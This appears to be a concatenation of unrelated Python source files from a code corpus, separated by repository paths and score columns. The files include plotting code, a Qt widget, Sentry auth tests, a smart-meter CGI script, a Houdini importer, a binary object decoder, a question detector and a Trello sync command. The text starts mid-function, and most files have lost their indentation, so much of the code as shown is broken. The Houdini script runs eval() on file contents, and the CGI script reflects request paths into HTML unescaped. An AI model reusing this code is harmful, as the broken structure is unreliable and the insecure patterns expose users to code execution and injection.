# CALCULATE TABLE
traces_table = calc_table(analysis_fields, data_frame)
# PLOT GRAPH
traces_graph.append(traces_table)
layout = go.Layout(images=LOGO, title=title, barmode='stack',
yaxis=dict(title='Power Capacity [kW]', domain=[.35, 1]),
xaxis=dict(title='Point in the Pareto Curve'))
fig = go.Figure(data=traces_graph, layout=layout)
plot(fig, auto_open=False, filename=output_path)
return {'data': traces_graph, 'layout': layout}
def calc_table(analysis_fields, data_frame):
# analysis of renewable energy share
data_frame['load base unit'] = calc_top_three_technologies(analysis_fields, data_frame, analysis_fields)
table = go.Table(domain=dict(x=[0, 1], y=[0, 0.2]),
header=dict(values=['Individual ID', 'Building connectivity [%]', 'Load Base Unit']),
cells=dict(values=[data_frame.index, data_frame['Buildings Connected Share'].values,
data_frame['load base unit'].values]))
return table
def calc_graph(analysis_fields, data):
# CALCULATE GRAPH FOR CONNECTED BUILDINGS
graph = []
data['total'] = data[analysis_fields].sum(axis=1)
data['Name'] = data.index.values
data = data.sort_values(by='total', ascending=False) # this will get the maximum value to the left
for field in analysis_fields:
y = data[field]
flag_for_unused_technologies = all(v == 0 for v in y)
if not flag_for_unused_technologies:
name = NAMING[field]
total_perc = (y / data['total'] * 100).round(2).values
total_perc_txt = ["(" + str(x) + " %)" for x in total_perc]
trace = go.Bar(x=data['Name'], y=y, text=total_perc_txt, name = name,
marker=dict(color=COLOR[field]))
graph.append(trace)
# CALCULATE GRAPH FOR DISCONNECTED BUILDINGS
return graph
def calc_building_connected_share(network_string):
share = round(sum([int(x) for x in network_string]) / len(network_string) * 100, 0)
return share
def calc_renewable_share(all_fields, renewable_sources_fields, dataframe):
nominator = dataframe[renewable_sources_fields].sum(axis=1)
denominator = dataframe[all_fields].sum(axis=1)
share = (nominator / denominator * 100).round(2)
return share
def calc_top_three_technologies(analysis_fields, data_frame, fields):
top_values = []
data = data_frame[analysis_fields]
for individual in data.index:
top_values.extend(data.ix[individual].sort_values(ascending=False)[:1].index.values)
# change name
top_values = [x.split('_capacity', 1)[0] for x in top_values]
return top_values
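# Usage sketch (illustrative only; the capacity column names below are placeholders
# and must in practice be keys of NAMING/COLOR from cea.plots.variable_naming):
#
#   import pandas as pd
#   df = pd.DataFrame({'Capacity_PV_W': [100, 0], 'Capacity_CHP_NG_W': [50, 80],
#                      'Buildings Connected Share': [60, 100]}, index=['ind1', 'ind2'])
#   pareto_capacity_installed(df, ['Capacity_PV_W', 'Capacity_CHP_NG_W'],
#                             'Capacity installed', 'pareto_capacity.html')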
| 1.890625 | 2 |
spectrochempy_gui/widgets/progresswidget.py | fernandezc/spectrochempy_gui | 0 | 41988 | #!/usr/bin/env python
"""
Author: <NAME> <<EMAIL>>
License: LGPL
Note: I've licensed this code as LGPL because it was a complete translation of the code found here...
https://github.com/mojocorp/QProgressIndicator
Adapted to spectrochempy_gui
"""
import sys
from spectrochempy_gui.pyqtgraph.Qt import QtCore, QtGui, QtWidgets
class QProgressIndicator(QtGui.QWidget):
m_angle = None
m_timerId = None
m_delay = None
m_displayedWhenStopped = None
m_color = None
def __init__(self, parent):
# Call parent class constructor first
super().__init__(parent)
# Initialize Qt Properties
self.setProperties()
        # Initialize instance variables
self.m_angle = 0
self.m_timerId = -1
self.m_delay = 40
self.m_displayedWhenStopped = False
self.m_color = QtCore.Qt.black
# Set size and focus policy
self.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
self.setFocusPolicy(QtCore.Qt.NoFocus)
# Show the widget
self.show()
    def animationDelay(self):
        return self.m_delay
def isAnimated(self):
return (self.m_timerId != -1)
    def isDisplayedWhenStopped(self):
        return self.m_displayedWhenStopped
    def getColor(self):
        return self.m_color
def sizeHint(self):
return QtCore.QSize(20, 20)
def startAnimation(self):
self.m_angle = 0
if self.m_timerId == -1:
self.m_timerId = self.startTimer(self.m_delay)
def stopAnimation(self):
if self.m_timerId != -1:
self.killTimer(self.m_timerId)
self.m_timerId = -1
self.update()
def setAnimationDelay(self, delay):
if self.m_timerId != -1:
self.killTimer(self.m_timerId)
self.m_delay = delay
if self.m_timerId != -1:
self.m_timerId = self.startTimer(self.m_delay)
    def setDisplayedWhenStopped(self, state):
        self.m_displayedWhenStopped = state
        self.update()
def setColor(self, color):
self.m_color = color
self.update()
def timerEvent(self, event):
self.m_angle = (self.m_angle + 30) % 360
self.update()
def paintEvent(self, event):
if (not self.m_displayedWhenStopped) and (not self.isAnimated()):
return
width = min(self.width(), self.height())
painter = QtGui.QPainter(self)
painter.setRenderHint(QtGui.QPainter.Antialiasing)
outerRadius = (width - 1) * 0.5
innerRadius = (width - 1) * 0.5 * 0.38
capsuleHeight = outerRadius - innerRadius
capsuleWidth = capsuleHeight * .23 if (width > 32) else capsuleHeight * .35
capsuleRadius = capsuleWidth / 2
for i in range(0, 12):
color = QtGui.QColor(self.m_color)
if self.isAnimated():
color.setAlphaF(1.0 - (i / 12.0))
else:
color.setAlphaF(0.2)
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(color)
painter.save()
painter.translate(self.rect().center())
painter.rotate(self.m_angle - (i * 30.0))
painter.drawRoundedRect(capsuleWidth * -0.5, (innerRadius + capsuleHeight) * -1, capsuleWidth,
capsuleHeight, capsuleRadius, capsuleRadius)
painter.restore()
def setProperties(self):
self.delay = QtCore.pyqtProperty(int, self.animationDelay, self.setAnimationDelay)
self.displayedWhenStopped = QtCore.pyqtProperty(bool, self.isDisplayedWhenStopped, self.setDisplayedWhenStopped)
self.color = QtCore.pyqtProperty(QtGui.QColor, self.getColor, self.setColor)
def TestProgressIndicator():
app = QtGui.QApplication(sys.argv)
progress = QProgressIndicator(None)
progress.setAnimationDelay(70)
progress.startAnimation()
# Execute the application
sys.exit(app.exec_())
if __name__ == "__main__":
TestProgressIndicator()
| 1.765625 | 2 |
tests/sentry/coreapi/test_auth_from_request.py | uandco/sentry | 4 | 42116 | <reponame>uandco/sentry
from __future__ import absolute_import
import mock
import pytest
from django.core.exceptions import SuspiciousOperation
from sentry.coreapi import ClientAuthHelper, APIUnauthorized
def test_valid():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_valid_missing_space():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_valid_ignore_case():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'SeNtRy sentry_key=value, biz=baz'}
request.GET = {}
result = helper.auth_from_request(request)
assert result.public_key == 'value'
def test_invalid_header_defers_to_GET():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'foobar'}
request.GET = {'sentry_version': '1', 'foo': 'bar'}
result = helper.auth_from_request(request)
assert result.version == '1'
def test_invalid_legacy_header_defers_to_GET():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_AUTHORIZATION': 'foobar'}
request.GET = {'sentry_version': '1', 'foo': 'bar'}
result = helper.auth_from_request(request)
assert result.version == '1'
def test_invalid_header_bad_token():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentryfoo'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_invalid_header_missing_pair():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry foo'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_invalid_malformed_value():
helper = ClientAuthHelper()
request = mock.Mock()
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,,biz=baz'}
request.GET = {}
with pytest.raises(APIUnauthorized):
helper.auth_from_request(request)
def test_multiple_auth_suspicious():
helper = ClientAuthHelper()
request = mock.Mock()
request.GET = {'sentry_version': '1', 'foo': 'bar'}
request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'}
with pytest.raises(SuspiciousOperation):
helper.auth_from_request(request)
| 1.429688 | 1 |
n3rgy-consumer-data.py | n3rgy/consumer-data | 10 | 42244 | <filename>n3rgy-consumer-data.py
#!/usr/bin/python
# Copyright 2020 by <NAME>, n3rgy data ltd.
# All rights reserved.
#
# Sample script to interact with https://data.n3rgy.com service
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OF ANY KIND, either express or implied.
#
import json, cgi, requests, os
import base64, urllib
print "Content-type: text/html\n\n"
form = cgi.FieldStorage()
#
# fetch cookies for apiKey and service type (live/sandbox)
#
url = "https://consumer-api.data.n3rgy.com"
AUTH = ""
handler = {}
if 'HTTP_COOKIE' in os.environ:
cookies = os.environ['HTTP_COOKIE']
cookies = cookies.split('; ')
for cookie in cookies:
cookie = cookie.split('=')
handler[cookie[0]] = cookie[1]
if handler['n3rgyConsumerAuthorization']:
AUTH = handler['n3rgyConsumerAuthorization']
durl = "/cgi-bin/n3rgy-consumer-data.py"
headers = {'Authorization': AUTH}
path_info = os.environ.get("PATH_INFO")
if path_info is None:
path_info = ""
querystring = os.environ.get("QUERY_STRING")
if querystring is None:
querystring = ""
apiurl = url + path_info + "?" + querystring
print '<html><head><link rel="stylesheet" href="/data/n3rgy.css"><body><img src="https://data.n3rgy.com/assets/img/logo/logo-light.png"></head><body bgcolor=#637381><h1>Consumer Smart Meter Data</h1><pre>'
print "<b>n3rgy data API Call: </b> " + apiurl + "<p>"
print "<b>n3rgy data API Response: </b><br>"
# Fetch API data
#
rdata = requests.get( url=apiurl, headers=headers )
# Get JSON from response
# [added support for output=csv parameter, just print if it's not a json response]
#
try:
r = rdata.json()
except:
print rdata.text
print "</pre><p>"
print "<h3><a href='..'>back</a></h3></body></html>"
    exit()
# Copy JSON to add HTML links
#
h = r.copy()
# convert entries into HTML links (if there are any)
#
i=0
try:
while i < len(r['entries']):
h['entries'][i] = "<a href='" + durl + path_info + '/' + r['entries'][i] + "'>" + r['entries'][i] + "</a>"
i=i+1
except:
try:
h['entries'] = "<a href='" + durl + path_info + '/' + str(r['entries'][0]) + "'>" + str(r['entries'][0]) + "</a>"
except:
x=1
print json.dumps(h, indent=2)
print "</pre><p>"
print "<h3><a href='..'>back</a></h3></body></html>"
| 1.40625 | 1 |
rsLight_import.py | initialfx/Maya-to-Houdini | 1 | 42372 | import json
def filePath():
""" ask for file path"""
filepath = hou.ui.selectFile()
return filepath
def getData(filename):
return eval(open(filename).read(), {"false": False, "true":True})
temp_data = getData(filePath())
for i in range(len(temp_data)):
#print(dict[i])
data = temp_data[i]
# Create Root Null
sceneroot = hou.node('/obj')
globalnull = sceneroot.createNode('null', 'size_locator')
globalnull.setParms({'scale': 1})
# Create RS_Light
light = hou.node("/obj").createNode('rslight', 'Key')
light.setInput(0, globalnull)
hou.node("obj").layoutChildren()
light.parmTuple('t').set(tuple(data["translate"][0]))
light.parmTuple('r').set(tuple(data["rotate"][0]))
light.parm('RSL_intensityMultiplier').set(data["intensity"])
light.parm('Light1_exposure').set(data["exposure"])
light.parm('RSL_affectDiffuse').set(data["affectsDiffuse"])
light.parm('RSL_bidirectional').set(data["areaBidirectional"])
light.parm('RSL_visible').set(data["areaVisibleInRender"])
light.parm('RSL_volumeScale').set(data["volumeRayContributionScale"])
light.parm('RSL_areaShape').set(data["areaShape"])
light.setGenericFlag(hou.nodeFlag.DisplayComment, True)
light.setComment(data["name"])
#attributes = ['scale', 'rotate', 'translate', 'intensity', 'color', 'affectsDiffuse', 'affectsSpecular','areaVisibleInRender', 'areaBidirectional', 'volumeRayContributionScale',
# 'exposure', 'areaShape','spotConeAngle', 'areaSamples','areaSpread','on', 'colorR', 'colorG','colorB','temperature','colorMode', 'intensity',
# 'exposure', 'unitsType','lumensperwatt','decayType','falloffStart', 'falloffStop', 'shadow', 'shadowTransparency',
# 'SAMPLINGOVERRIDES_shadowSamplesScale','SAMPLINGOVERRIDES_numShadowSamples', 'spotConeFalloffAngle',
# 'spotConeFalloffCurve','affectedByRefraction', 'emitGiPhotons', 'emitCausticPhotons','normalize',
# 'photonIntensityMultiplierGI','photonIntensityMultiplierCaustics','diffuseRayContributionScale',
# 'glossyRayContributionScale','singleScatteringRayContributionScale','multipleScatteringRayContributionScale',
# 'indirectRayContributionScale', 'indirectMaxTraceDepth', 'volumeRayContributionScale','volumeNumSamples','dropoff']
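# Illustrative sketch of the JSON this importer expects; the field names are taken
# from the keys read above, but the values (and the light name) are made up:
#
# [
#   {
#     "name": "key_light",
#     "translate": [[0.0, 5.0, 10.0]],
#     "rotate": [[-30.0, 0.0, 0.0]],
#     "intensity": 1.0,
#     "exposure": 2.0,
#     "affectsDiffuse": 1,
#     "areaBidirectional": 0,
#     "areaVisibleInRender": 1,
#     "volumeRayContributionScale": 1.0,
#     "areaShape": 0
#   }
# ]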
| 1.484375 | 1 |
tools/mufom.py | asterick/pokemon-tc | 0 | 42500 | from struct import unpack
import sys, re
# Not listed:
# @SPLT
# @CALL
# 6?
FUNCTIONS = {
0x90: "<<",
0x91: ">>",
0x92: "@UDEF2",
0x93: "@DUPL",
0x94: "@EXCH",
0x95: "@UDEF5",
0x96: "@UDEF6",
0x97: "@UDEF7",
0x98: "@UDEF8",
0x99: "@UDEF9",
0x9A: "@UDEFA",
0x9B: "@UDEFB",
0x9C: "@UDEFC",
0x9D: "@UDEFD",
0x9E: "@UDEFE",
0x9F: "@UDEFF",
# FUNCTIONS
0xA0: "@F",
0xA1: "@T",
0xA2: "@ABS",
0xA3: "@NEG",
0xA4: "@NOT",
0xA5: "+",
0xA6: "-",
0xA7: "/",
0xA8: "*",
0xA9: "@MAX",
0xAA: "@MIN",
0xAB: "@MOD",
0xAC: "<",
0xAD: ">",
0xAE: "=",
0xAF: "!=",
0xB0: "@AND",
0xB1: "@OR",
0xB2: "@XOR",
0xB3: "@EXT",
0xB4: "@INS",
0xB5: "@ERR",
0xB6: "@IF",
0xB7: "@ELSE",
0xB8: "@ENDIF",
0xB9: "@ISDEF",
0xBE: "(",
0xBF: ")"
}
class Decoder:
def __init__(self, fo):
self.fo = fo
def commands(self):
while True:
code = self.expect("Command")
if code == 0xE0:
yield ('MB', self.string(), self.string())
elif code == 0xE1:
break
elif code == 0xEA:
yield ('CO', self.number(), self.string())
elif code == 0xEB:
yield ('DT', self.numbers())
elif code == 0xE2:
yield ('AS', self.variable(), self.expression())
elif code == 0xE4:
yield ('LR', *self.list("String"))
elif code == 0xED:
yield ('LD', self.string())
# Loading Commands
else:
yield (code, self.list("Letter", "Number", "Function"))
def byte(self):
return ord(self.fo.read(1))
def type(self):
code = self.byte()
if code <= 0x8F:
return "Number"
elif code >= 0x90 and code <= 0xBF:
return "Function"
elif code >= 0xC1 and code <= 0xDA:
return "Letter"
elif code >= 0xE0 and code <= 0xFF:
return "Command"
else:
return "Undefined"
def peek(self):
before = self.fo.tell()
type = self.type()
self.fo.seek(before)
return type
def expect(self, *types):
type = self.peek()
if "Variable" in types and type == "Letter":
type = "Variable"
elif "String" in types and type == "Number":
type = "String"
if not type in types:
raise Exception("Expected %s: got %s" % (', '.join(types), type))
translate = {
"Command": self.byte,
"Function": self.function,
"Number": self.number,
"Letter": self.letter,
"Variable": self.variable,
"String": self.string
}
return translate[type]()
# Lists
def list(self, *types):
terms = []
while True:
before = self.fo.tell()
try:
terms += [self.expect(*types)]
except:
self.fo.seek(before)
return terms
def section_types(self):
terms = []
while self.peek() == "Letter":
l = self.expect("Letter")
if l == "Y":
terms += [l + str(self.number())]
else:
terms += [l]
return terms
def letters(self):
return self.list("Letter")
def numbers(self):
return self.list("Number")
def expressions(self):
return self.expression()
# Atomics
def term(self):
return self.expect("Function", "Number", "Variable")
def variable(self):
prefix = self.letter()
if prefix in "LPRS":
suffix = self.number()
if suffix:
return prefix + str(suffix)
else:
return prefix
elif prefix in "INWXT":
return prefix + str(self.number())
elif prefix == "G":
return prefix
else:
return prefix
raise Exception("Expected a variable")
def expression(self, top = True):
return self.list("Variable", "Number", "Function")
def function(self):
code = self.byte()
if not code in FUNCTIONS:
raise Exception("Expected a function")
return FUNCTIONS[code]
def letter(self):
code = self.byte()
if code >= 0xC1 and code <= 0xDA:
return chr(ord('A') + code - 0xC1)
else:
raise Exception("Expected a letter")
def number(self):
code = self.byte()
if code <= 0x7F:
return code
elif code == 0x80:
return None
elif code <= 0x8F:
return sum([v << (i * 8) for i, v in enumerate(self.fo.read(code - 0x80)[::-1])])
else:
raise Exception("Expected a number: %2x" % code)
def string(self):
return self.fo.read(self.number())
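
# Minimal usage sketch (added for illustration, not part of the original module):
# walk a MUFOM object file opened in binary mode and print each parsed command.
if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fo:
        for command in Decoder(fo).commands():
            print(command)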
| 1.703125 | 2 |
astroquery/ned/__init__.py | cdeil/astroquery | 0 | 42628 | <gh_stars>0
from .nedpy import *
| 0.09375 | 0 |
lib/bot/question/detector.py | mageirakos/donkeybot | 10 | 42756 | # bot modules
from bot.question.emails import EmailQuestion
from bot.question.issues import IssueQuestion
from bot.question.comments import CommentQuestion
import bot.config as config
# general python
import re
import nltk
from nltk.tokenize import PunktSentenceTokenizer
class QuestionDetector:
"""Utilizes regex patterns to match questions inside a text."""
def __init__(self, detector_type=None):
"""
Creates a QuestionDetector of some type.
The type holds the origin of the question
        :param detector_type: one of ['email', 'issue', 'comment']
"""
assert detector_type in ["email", "issue", "comment"]
self.type = detector_type
self.tokenizer = nltk.tokenize.punkt.PunktSentenceTokenizer()
self.QUESTION_REGEX = re.compile(r"[A-Z][a-z][^A-Z]*[?]$")
self.LOWERED_QUESTION_REGEX = re.compile(
r"(how |wh|can |could |do |does |should |would |may |is |are |have |has |will |am ).*[?]$"
)
# we can add more regexes to the list below for exceptions
self.EXCEPTIONS_REGEX = [config.URL_REGEX]
def detect(self, text):
"""
Detect and create Question objects from input text.
Detect the question as follows:
1) First pattern matches questions without lowering the text
2) Second pattern matches questions after having lowered the text
:param text : String upon which the detection algorithm runs
:return questions : list of Question Objects
"""
# part 1
questions = self._match_questions(text, self.QUESTION_REGEX)
for i, question in enumerate(questions):
# padding needed so that (start, end) indexes of Question object are correct
padding = ""
for _ in text[question.start : question.end]:
padding += " "
assert len(text) == len(
text[: question.start] + padding + text[question.end :]
)
# 'hide' already identified question and move on to next
text = text[: question.start] + padding + text[question.end :]
# part 2
lowered_text = text.lower()
# loop needed after first run since _match_questions returns a list (even if empty list)
[
questions.append(match)
for match in self._match_questions(
lowered_text, self.LOWERED_QUESTION_REGEX
)
]
# The reason no padding exists here is because we don't have a 3rd regex trying to match if we did
# we would have to hide already identified questions in the text from the next pattern
return questions
def _create_question(self, text, start, end):
"""Creates <Question obj> based on type"""
if self.type == "email":
question = EmailQuestion(question_text=text, start_idx=start, end_idx=end)
elif self.type == "issue":
question = IssueQuestion(question_text=text, start_idx=start, end_idx=end)
elif self.type == "comment":
question = CommentQuestion(question_text=text, start_idx=start, end_idx=end)
return question
def _match_questions(self, text, pattern):
"""
Private class function that returns questions found based on input text
and regex patterns.
Sentence tokenization is applied before trying to match a Question.
:param text : text upon which the detection takes place
:param pattern : compiled regex pattern used to detect the questions
:return questions : list of Question Objects
"""
questions = []
# get all exceptions present in the text
exceptions = self._get_exception_matches(text)
sentences = self.tokenizer.tokenize(text)
sentence_indices = list(self.tokenizer.span_tokenize(text))
for i, sentence in enumerate(sentences):
matches = pattern.search(sentence)
sent_start = sentence_indices[i][0]
# sent_end = sentence_indices[i][1]
if matches is not None:
# before appending check if the match is part of any exceptions
if self._is_exception(exceptions, matches.group()):
continue
else:
q_start = sent_start + matches.start()
q_end = sent_start + matches.end()
question = self._create_question(
text=matches.group(), start=q_start, end=q_end
)
questions.append(question)
return questions
def _get_exception_matches(self, text):
"""
Returns list of strings inside text that are definitely not questions based on our
EXCEPTION_REGEX patterns.We can add multitude of exceptions
eg. URLs, code blocks, File, RSEs ...
<!> Note: URLs (only exceptions matched for now)
:return exceptions: list of string which we should not consider as questions
"""
exceptions = []
for pattern in self.EXCEPTIONS_REGEX:
if pattern.search(text) is not None:
for match in pattern.finditer(text):
exceptions.append(match.group())
return exceptions
@staticmethod
def _is_exception(exceptions, question):
"""
Check that the question found is not part of any exceptions.
eg. URLs (only exceptions matched for now)
:return : Boolean
"""
for exception in exceptions:
if question.lower() in exception.lower():
print("\nFound a Question exception :")
print(question, exception)
return True
return False
if __name__ == "__main__":
pass
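    # Minimal usage sketch (illustrative, not from the original repo): detect the
    # questions inside a support message and show where each match was found.
    detector = QuestionDetector(detector_type="email")
    sample = "Hi team. How do we renew the proxy? Thanks for the help."
    for q in detector.detect(sample):
        print(sample[q.start:q.end], (q.start, q.end))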
| 2.671875 | 3 |
kneaddata/db_preprocessing/mergesams.py | zwets/kneaddata | 41 | 42884 | import argparse
def merge(infiles, outfile):
setReads = set()
for infile in infiles:
with open(infile, "r") as fileIn:
for strLine in fileIn:
if strLine.startswith('@'):
continue
strSplit = strLine.split("\t")
if strSplit[2] != '*':
setReads.add(strSplit[0])
with open(outfile, "w") as fileOut:
for strRead in setReads:
fileOut.write(strRead + "\n")
return(len(setReads))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("infiles", nargs="+",
help="sam files you wish to merge")
parser.add_argument("outfile", help="output file")
args = parser.parse_args()
iNumUniqReads = merge(args.infiles, args.outfile)
print("Number of merged reads: " + str(iNumUniqReads))
return 0
if __name__ == '__main__':
main()
| 1.921875 | 2 |
image-editor/data_editor/image/image_view.py | flegac/deep-experiments | 0 | 43012 | <reponame>flegac/deep-experiments
import tkinter as tk
import rx.operators as ops
from PIL import ImageTk, Image
from rx.subject import Subject
from data_editor.image.view_controller import ViewController
from data_toolbox.data.data_source import DataSource
from data_toolbox.image.buffer_factory import ImageFactory
class ImageView(tk.Frame):
MAX_REDRAW_PER_SEC = 1000
def __init__(self, master: tk.Widget, width: int = 600, height: int = 400):
tk.Frame.__init__(self, master)
self._source_change_bus = Subject()
self._source_change_bus.pipe(
ops.throttle_first(1. / ImageView.MAX_REDRAW_PER_SEC),
# ops.debounce(1. / ImageView.MAX_REDRAW_PER_SEC),
).subscribe(on_next=lambda _: self._redraw(_))
# canvas creation
self.canvas = tk.Canvas(self, width=width, height=height)
self.canvas.pack(expand=True, fill="both")
# image
self.data = None
self.image_id = None
self.viewport_controller = ViewController(self.canvas, self.set_source)
# Bind events to the Canvas
self.canvas.bind('<Configure>', lambda _: self._redraw(None))
for k, v in self.viewport_controller.bindings().items():
self.canvas.bind(k, v)
def mouse_image_coords(self):
return self.viewport_controller.mouse_image_coords()
def reset_viewport(self):
self.viewport_controller.viewport.zoom_factor = 0
self.viewport_controller.viewport.x = 0
self.viewport_controller.viewport.y = 0
def set_source(self, source: DataSource = None):
self._source_change_bus.on_next(source)
def _redraw(self, source: DataSource = None):
if source is not None:
self.data = source.get_data()
if self.image_id:
self.canvas.delete(self.image_id)
if self.data is None:
return
data = self.viewport_controller.viewport.apply(self.data)
self.canvas.image = ImageTk.PhotoImage(image=Image.fromarray(data))
self.image_id = self.canvas.create_image((0, 0), anchor=tk.NW, image=self.canvas.image)
self.canvas.lower(self.image_id) # set it into background
if __name__ == '__main__':
root = tk.Tk()
editor = ImageView(root)
editor.set_source(ImageFactory.random)
editor.pack(fill='both', expand=True)
root.mainloop()
| 1.992188 | 2 |
app/models.py | Nasfame/Mobile-Wallet | 0 | 43140 | <gh_stars>0
from datetime import datetime
from flask_login import UserMixin
from pytz import timezone
from . import db
def time_now():
IST = timezone('Asia/Kolkata')
return datetime.now(IST)
class User(db.Model, UserMixin):
__tablename__ = "user"
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(150), nullable=False, unique=True)
password = db.Column(db.String(150), nullable=False)
balance = db.Column(db.Float(44))
class Transaction(db.Model):
__tablename__ = "transaction"
id = db.Column(db.Integer, primary_key=True)
sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
receiver_id = db.Column(db.Integer, db.ForeignKey('user.id'))
amount = db.Column(db.Float(44), nullable=False)
    # pass the callable (not its result) so the timestamp is evaluated at insert time
    date = db.Column(db.DateTime(timezone=True), default=time_now)
@property
def repr(self):
return {"id": self.id, "date": self.date.strftime('%d/%m/%y %H:%M:%S'), "sender_id": self.sender_id,
"receiver_id": self.receiver_id, "amount": self.amount}
# def as_dict(self):
# return {c.name: getattr(self, c.name) for c in self.__table__.columns}
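# Illustrative sketch (not part of the app): the default SQLAlchemy constructor
# accepts the column names as keyword arguments, so a transfer row can be built as
#
#   t = Transaction(sender_id=1, receiver_id=2, amount=25.0)
#   db.session.add(t)
#   db.session.commit()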
| 1.5 | 2 |
core/management/commands/sync_events_dashboard.py | vanessa/djangogirls | 446 | 43268 | import datetime
import re
import time
from collections import namedtuple
from django.conf import settings
from django.core.management.base import BaseCommand
from trello import ResourceUnavailable, TrelloClient
from core.models import Event
# Create new command
class Command(BaseCommand):
help = 'Syncs event in trello board. Need a token.'
missing_args_message = (
'You need to add a token! Get one here: '
'https://trello.com/1/authorize?key=01ab0348ca020573e7f728ae7400928a&scope=read%2Cwrite&'
'name=My+Application&expiration=1hour&response_type=token'
)
def add_arguments(self, parser):
parser.add_argument('trello_token', type=str)
def handle(self, *args, **options):
token = options['trello_token']
events = event_list()
sync(events, token)
# Get data
EventTuple = namedtuple('EventTuple', 'name id city date')
def event_list():
event = Event.objects.all()
result = []
for e in event:
name = e.name
_id = str(e.pk)
city = e.city
date = datetime.date(e.date.year, e.date.month, e.date.day or 1)
result.append(EventTuple(name, _id, city, date))
return result
# Sync to trello
ADMIN_BASE_URL = 'https://djangogirls.org/admin/core/event/'
def sync(events, token):
trello = TrelloClient(api_key=settings.TRELLO_API_KEY, token=token)
board = trello.get_board('55f7167c46760fcb5d68b385')
far_away, less_2_months, less_1_month, less_1_week, today, past = board.all_lists()
all_cards = {card_id(c): c for c in board.all_cards()}
date_today = datetime.date.today()
for e in events:
card = all_cards.get(e.id)
if not card:
card = create_card(e, far_away)
create_checklist(card)
# fetch card to get due date
try:
card.fetch()
except ResourceUnavailable:
print("Oopsie: too many requests! Let's wait 10 seconds!")
time.sleep(10)
card.fetch()
if e.date != card.due_date.date():
print('Changing due date of {} to {}'.format(e.city, e.date))
card.set_due(e.date)
distance = (e.date - date_today).days
if distance < 0:
right_list = past
elif distance == 0:
right_list = today
elif distance < 7:
right_list = less_1_week
elif distance < 30:
right_list = less_1_month
elif distance < 60:
right_list = less_2_months
else:
right_list = far_away
ensure_card_in_list(card, right_list)
def card_id(card):
m = re.search(ADMIN_BASE_URL + r'(\d+)',
card.desc)
return m.group(1)
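# Worked example (illustrative): card_id() recovers the event primary key from the
# admin URL stored in the card description, e.g. a description containing
# "https://djangogirls.org/admin/core/event/1234" yields the string "1234".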
def create_card(event, list):
print('Creating card {} ({})'.format(event.city, event.date.isoformat()))
return list.add_card(name=event.city,
desc=ADMIN_BASE_URL + event.id,
due=event.date.isoformat())
def create_checklist(card):
card.add_checklist("Things to do:", [
"2 month check", "1 month check", "Thank you email and request for stats", "Stats obtained"])
def ensure_checklist_in_card(card):
if not card.checklists:
print("Adding checklist to {} card.".format(card.name))
create_checklist(card)
def ensure_card_in_list(card, list):
if card.list_id != list.id:
print('Moving {} to {}'.format(
card.name, list.name))
card.change_list(list.id)
| 1.515625 | 2 |
gubbing/models/networks/temporal_net.py | mychiux413/gubbing | 0 | 43396 | <reponame>mychiux413/gubbing<gh_stars>0
import tensorflow as tf
from tensorflow.keras import layers, Model
class TemporalNetwork(Model):
pass
| 0.949219 | 1 |
autobot/config_loader.py | fotini-pan/autobot | 0 | 43524 | <reponame>fotini-pan/autobot<gh_stars>0
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Performs project's configuration loading."""
import os
from configparser import ConfigParser
from dotenv.main import dotenv_values
import autobot.config as config
class Config:
"""Interact with configuration variables."""
dotenv_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), ".env")
ini_parser = ConfigParser()
ini_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), "config.ini")
config = {}
@classmethod
def __init__(cls, **kwargs):
"""Initialize configuration."""
cls.load_config(**kwargs)
@classmethod
def load_config(cls, **kwargs):
"""Get autobot configuration values."""
cls.config = cls.env_config()
cls.ini_parser.optionxform = str
cls.ini_parser.read(cls.ini_path)
cls.config.update(cls.ini_config())
cls.config.update(kwargs)
py_config = cls.py_config()
defaults = {
key: py_config[key] for key in py_config if key not in cls.config.keys()
}
cls.config.update(defaults)
cls.config = {key: cls.config[key] for key in py_config}
@classmethod
def env_config(cls):
"""Get autobot configuration values from .env file."""
return dotenv_values(cls.dotenv_path)
@classmethod
def ini_config(cls):
"""Get autobot configuration values from config.ini file."""
return cls.ini_parser["AUTOBOT"]
@classmethod
def py_config(cls):
"""Get autobot configuration values from config.py file."""
res = {}
for k in dir(config):
if k.startswith("AUTOBOT_"):
res.setdefault(k, getattr(config, k))
return res
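# Usage sketch (illustrative, not part of the package): .env values are read first,
# then overridden by the [AUTOBOT] section of config.ini and by any keyword
# overrides; config.py AUTOBOT_* values fill in missing keys and define which keys
# are kept at all.
#
#   cfg = Config(AUTOBOT_GH_TOKEN="...")   # AUTOBOT_GH_TOKEN is a hypothetical key
#   print(cfg.config)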
| 1.414063 | 1 |
app/dtclasses.py | blurmcclure18/ExpenseTracker | 16 | 43652 | <gh_stars>10-100
